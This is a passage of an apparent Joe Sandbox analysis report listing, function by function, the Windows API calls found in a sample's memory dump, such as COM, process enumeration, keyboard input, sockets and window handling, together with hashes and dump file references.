                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: 77923a487e2c8f4b95116bf0deec622a9dddd8c92e43402f07e29b0c3f51cd13
                                                    • Instruction ID: e765216ec4f9ca4a607e7403709aa41e0fe0af70c1cbfb3e1eed6b7b4bd4d1a6
                                                    • Opcode Fuzzy Hash: 77923a487e2c8f4b95116bf0deec622a9dddd8c92e43402f07e29b0c3f51cd13
                                                    • Instruction Fuzzy Hash: CAC16871A08341CFC714DF29C48496ABBE4FF89714F04896EF8999B351D739E946CB82
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 007E87AD
                                                    • CoUninitialize.OLE32 ref: 007E87B8
                                                      • Part of subcall function 007FDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,007E8A0E,?,00000000), ref: 007FDF71
                                                    • VariantInit.OLEAUT32(?), ref: 007E87C3
                                                    • VariantClear.OLEAUT32(?), ref: 007E8A94
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 020c6e24e31eb45d776522cf0f8295ddad34d43f526099bc2ed678c35ff53a46
                                                    • Instruction ID: 1172dac1823723ed9e4799e26140a218ea4e968bf1f9e792f7d7c88971ee276d
                                                    • Opcode Fuzzy Hash: 020c6e24e31eb45d776522cf0f8295ddad34d43f526099bc2ed678c35ff53a46
                                                    • Instruction Fuzzy Hash: 72A15875604B41DFCB50DF25C485B2AB7E5BF88354F148859FA999B3A2CB38ED00CB92
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8308
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8320
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00800988,000000FF,?,00000000,00000800,00000000,?,00803C4C,?), ref: 007C8345
                                                    • _memcmp.LIBCMT ref: 007C8366
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    • Opcode ID: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
                                                    • Instruction ID: 38e86e68464498fa2867b9f173dca789d827fcc89b40aa2e2da876e84ed40fd0
                                                    • Opcode Fuzzy Hash: f94d86fe822a54bbea3b7d88ed229ff7b64ee1a682fac84f37e36700275df3ef
                                                    • Instruction Fuzzy Hash: 3D813971A00109EFCB44DF94C888EEEB7B9FF89315F20855CE516AB250DB75AE06CB61
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 02ef66658a6465717dfbc5a01256f3821ce4bafe39ff7f4620292d51ac3cda61
                                                    • Instruction ID: 6bf604dd1c1721854cf71ef40a147b87327eb3f2cd097511c39f48162fe2e531
                                                    • Opcode Fuzzy Hash: 02ef66658a6465717dfbc5a01256f3821ce4bafe39ff7f4620292d51ac3cda61
                                                    • Instruction Fuzzy Hash: E1519630608B01DADB289F79D899F2DB7E5AF44350F20981FE556DB2A2EF789840CF15
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007EF526
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 007EF534
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 007EF5F4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007EF603
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
                                                    • Instruction ID: 679d4d9b84fae71abb345d24d293b315d43795cdbec32158eb7ad356a02de0e7
                                                    • Opcode Fuzzy Hash: 8289f4e3b76002fa47891ed790cd36ba7b44dda78efe2fe8205be23584ce0260
                                                    • Instruction Fuzzy Hash: 9E518CB1104350EFD720EF24D88AE6BB7E8FF98740F40492DF595972A1EB74A905CB92
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 007F9E88
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 007F9EBB
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007F9F28
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: 8f3633b54881ce7e54f376a10bf46c4a0c284a57744b5aeb0a7147fad1b0e320
                                                    • Instruction ID: 909de08bb6aad657d39f2c4589452d5bec5472c580e179990b757d6e172a2b59
                                                    • Opcode Fuzzy Hash: 8f3633b54881ce7e54f376a10bf46c4a0c284a57744b5aeb0a7147fad1b0e320
                                                    • Instruction Fuzzy Hash: 07511A75A00209EFCB20DF54C884ABA7BB6FB94360F108569FA65D7390D735AD51CB90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                    • Instruction ID: 374332d67bf968dd470128744807e6bddd3587abc3916c518d5d16611e0bbfdc
                                                    • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                    • Instruction Fuzzy Hash: 6041B531B00706ABDF288E69E884D6F77A6EF45360B24C27DE85587650EB78ED428B44
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007CA68A
                                                    • __itow.LIBCMT ref: 007CA6BB
                                                      • Part of subcall function 007CA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007CA976
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007CA724
                                                    • __itow.LIBCMT ref: 007CA77B
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: 34d42b7b6d2d63641e7a38841008001cd5e7bea35a5d60cce342636b125e2107
                                                    • Instruction ID: 3d50ef3c217e30aa3c2a74854b38cf2a4a6bba96eb9ed5db4b403dd3ac604120
                                                    • Opcode Fuzzy Hash: 34d42b7b6d2d63641e7a38841008001cd5e7bea35a5d60cce342636b125e2107
                                                    • Instruction Fuzzy Hash: 99419E70A4020CABDF10EF54C84AFEE7BB9EF48755F44006DF905A3281DB789A45CBA2
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 007E70BC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E70CC
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E7130
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E713C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
                                                    • Instruction ID: 5be08b5e75b51e4d42974ea1592303bccfdd89d97ea2c01bc75c49931ad33bf5
                                                    • Opcode Fuzzy Hash: b74db70ecf1c376c0e31fb0260ea1a0a8e55e50df3589e12b2d93b13390eec35
                                                    • Instruction Fuzzy Hash: FF41A071740200EFEB24AF24DC8AF2A77A4EB48B54F14C458FA599B3C2DB789C018B91
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00800980), ref: 007E6B92
                                                    • _strlen.LIBCMT ref: 007E6BC4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: 31e92ed946c392afb0e722ffd6d4b8c689e3c55b870b4e6df72099076a33bd17
                                                    • Instruction ID: 14fe7995c5476f0ac637a27850c8c08175fa36dc24ae6d77e0ec607e9806ba31
                                                    • Opcode Fuzzy Hash: 31e92ed946c392afb0e722ffd6d4b8c689e3c55b870b4e6df72099076a33bd17
                                                    • Instruction Fuzzy Hash: A641D671601144EBCB04FB65DC99FBEB3A9EF68350F248155F91A97292DF38AD01CB60
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007DBEE1
                                                    • GetLastError.KERNEL32(?,00000000), ref: 007DBF07
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007DBF2C
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007DBF58
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 45fa1f88aa21b5d30b100ec3f46c820d78df36bc6022358fd91fcbf3edbd1dd5
                                                    • Instruction ID: 7a11774226e9777fd2fbbd334aaf73c021b4be8e804eae6cff1664011dbae3a9
                                                    • Opcode Fuzzy Hash: 45fa1f88aa21b5d30b100ec3f46c820d78df36bc6022358fd91fcbf3edbd1dd5
                                                    • Instruction Fuzzy Hash: 1C41E735600A10DFCB21EF15C589A59BBF1EF49360F19C489E9899B362CB38FD42DB91
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F8F03
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
                                                    • Instruction ID: 7aa7f90cf277ab344e28cd42b57090c28fb1e3d22f0dce39d220e5e1a4d6ac7d
                                                    • Opcode Fuzzy Hash: c63a13a9907c8a12a080d3adbc4e0382371b0ae4dedf975f0c019e550bb8e256
                                                    • Instruction Fuzzy Hash: AA31BC3061420DEEEFA09B18CC49BB837E6FB06320F144911FB51E63A1CF79EA509A52
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 007FB1D2
                                                    • GetWindowRect.USER32(?,?), ref: 007FB248
                                                    • PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
                                                    • MessageBeep.USER32(00000000), ref: 007FB2C9
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
                                                    • Instruction ID: a3d7a3666b1aff95d9999c1fe53e68f0ccd39e4ad14fccb7c9045daf91177ac8
                                                    • Opcode Fuzzy Hash: c2361a711c3141d890d2b495c52aca8bdaf177a6f245188d14daa2771da8d8d7
                                                    • Instruction Fuzzy Hash: 2C416A70A04219DFDB21CF98C884BAD7BF5FB89311F1485A9EA189B361D734E841DF50
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D1326
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 007D1342
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D13A8
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D13FA
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
                                                    • Instruction ID: 7bf1df79f5ea610c1d3e8cd0f576b6a2d597a388496665583bcaceb82ede4eb6
                                                    • Opcode Fuzzy Hash: 4f534c5dfee41ea36c55e256cf3fae958f65bed089282c3ba2b5f3de2ddd559e
                                                    • Instruction Fuzzy Hash: 60310770E40258BEFF348A658C09BFE7BB9AB45320F84421BE490627D1D37C89519BA1
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 007D1465
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 007D1481
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 007D14E0
                                                    • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 007D1532
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
                                                    • Instruction ID: da33f123ecaf165899e61500aa3b6a256b30bb0568d9b785c2acb072df800449
                                                    • Opcode Fuzzy Hash: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
                                                    • Instruction Fuzzy Hash: CA314E70E40298BEFF348A659C04BFABB75AB85310F88831BE491523D1C37C89559B61
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A642B
                                                    • __isleadbyte_l.LIBCMT ref: 007A6459
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A6487
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A64BD
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
                                                    • Instruction ID: 044d6566a71a918a6c151f423f5991fd6683d9214c3d250bc0594115c8ed8736
                                                    • Opcode Fuzzy Hash: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
                                                    • Instruction Fuzzy Hash: CE31C631604296EFDF218F75CC44BAA7BA5FF86310F194229F86487191EB39DA50DB50
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 007F553F
                                                      • Part of subcall function 007D3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D3B4E
                                                      • Part of subcall function 007D3B34: GetCurrentThreadId.KERNEL32 ref: 007D3B55
                                                      • Part of subcall function 007D3B34: AttachThreadInput.USER32(00000000,?,007D55C0), ref: 007D3B5C
                                                    • GetCaretPos.USER32(?), ref: 007F5550
                                                    • ClientToScreen.USER32(00000000,?), ref: 007F558B
                                                    • GetForegroundWindow.USER32 ref: 007F5591
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 56d9484335b99715d0fbf2c9997e0a3340dd0ef9753d2d089144ccb89afed5c4
                                                    • Instruction ID: dd4b96c257f30f34b82de776565b68ff22b73f6e47a235f301e0b34afcf04fd1
                                                    • Opcode Fuzzy Hash: 56d9484335b99715d0fbf2c9997e0a3340dd0ef9753d2d089144ccb89afed5c4
                                                    • Instruction Fuzzy Hash: CD312F71A00108EFDB10EFA5C8859EEB7F9EF98304F10806AE515E7241DB79AE408FA0
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • GetCursorPos.USER32(?), ref: 007FCB7A
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007ABCEC,?,?,?,?,?), ref: 007FCB8F
                                                    • GetCursorPos.USER32(?), ref: 007FCBDC
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007ABCEC,?,?,?), ref: 007FCC16
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
